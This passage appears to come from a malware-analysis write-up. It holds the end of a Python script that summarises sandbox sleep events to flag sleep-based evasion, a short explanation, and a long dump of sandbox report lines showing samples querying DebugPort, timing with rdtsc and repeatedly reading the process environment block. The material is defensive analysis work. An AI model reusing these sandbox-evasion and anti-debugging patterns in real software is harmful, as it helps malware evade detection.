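def summarize_sleeps(text):
    """Per (process, tid): batches of (calls, total_ms, ms_per_call) plus flags.
    A 'sleep count' line refers to the 'sleep time' line that follows it for
    the same thread; a 'sleep time' with no preceding count gets calls=None."""
    threads = defaultdict(lambda: {"batches": [], "total_ms": 0})
    pending = {}
    for proc, tid, kind, value in parse_sleep_events(text):
        key = (proc, tid)
        if kind == "count":
            pending[key] = value
            continue
        calls = pending.pop(key, None)
        per_call = value // calls if calls else None
        threads[key]["batches"].append((calls, value, per_call))
        threads[key]["total_ms"] += value
    for info in threads.values():
        info["infinite"] = any(t >= TIMESPAN_MAX_MS for _, t, _ in info["batches"])
        info["exceeds_budget"] = info["total_ms"] > SANDBOX_BUDGET_MS
        info["hours"] = round(info["total_ms"] / 3_600_000, 2)
    return dict(threads)


def verdicts(summary):
    """One line per thread that deserves a detection note."""
    out = []
    for (proc, tid), info in summary.items():
        if info["infinite"]:
            out.append(f"{proc} tid {tid}: TimeSpan.MaxValue sleep, never wakes unless the sandbox skips it")
        elif info["exceeds_budget"]:
            loops = [f"{c}x{p} ms" for c, _, p in info["batches"] if c]
            out.append(f"{proc} tid {tid}: {info['hours']} h of sleep via {', '.join(loops) or 'single calls'}")
    return out


if __name__ == "__main__":
    for line in verdicts(summarize_sleeps(REPORT_SLEEP_LINES)):
        print(line)
```

Recovering the per-call interval is what makes these numbers actionable: a loop of thousands of 2 s sleeps is what a sandbox's sleep-skipping handles, whereas a single TimeSpan.MaxValue request is effectively a self-suspend and is worth a dedicated detection on its own.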
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123417601.000000000127F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2314438483.000001B1F3C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E rdtsc
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004172C3 LdrLoadDll,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01130124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01198158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01140185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011301F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D61E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01184000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F80A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011980A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011820DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011420F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011860E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011080E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01120310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D8324 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011863C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011363FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D625D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01188243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01188243 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01180283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01180283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01180283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D62D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113656A mov eax, dword ptr fs:[00000030h]
